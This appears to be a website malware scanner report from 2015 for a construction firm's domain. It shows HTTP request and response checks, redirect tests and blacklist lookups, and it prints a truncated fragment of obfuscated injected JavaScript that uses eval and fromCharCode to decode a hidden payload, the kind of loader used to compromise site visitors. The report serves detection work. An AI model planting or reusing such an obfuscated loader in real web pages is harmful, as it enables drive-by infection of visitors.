Scanned pages/files
Request | Server response | Status |
http://needhishreebuildcon.com/ | 200 OK Content-Length: 5276 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
Object.prototype.qwe=function(){return String['fro'+'mCha'+'rCo'+'de'];};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('sd'))throw 1;}catch(q){zxc={}[i];}v=document.createTextNode('asd');var s="";try{eval('asdvds');}catch(q){for(i in v)r=v.childNodes.length+1}r*=2;e=eval;m=[-r+11,-r+11,-r+107,-r+104,-r+34,-r+42,-r+102,-r+113,-r+101,-r+119,-r+111,-r+103,-r+112,-r+118,-r+48,-r+105,-r+103,-r+118,-r+71,-r+110,-r+103,-r+111,-r+103,-r+112,-r+118,-r+117,-r+68,-r+123,-r+86,-r+99,-r+105,-r+80,-r+
Antivirus reports:
http://needhishreebuildcon.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: needhishreebuildcon.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 17:29:05 GMT
Accept-Ranges: bytes
ETag: "7d88c88-149c-50fbb5e176f41"
Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_fcgid/2.3.10-dev
Content-Length: 5276
Content-Type: text/html
Last-Modified: Mon, 23 Feb 2015 06:18:15 GMT
...5276 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: needhishreebuildcon.com
Referer: http://www.google.com/search?q=needhishreebuildcon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=needhishreebuildcon.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://needhishreebuildcon.com/
Result: needhishreebuildcon.com is not infected or malware details are not published yet.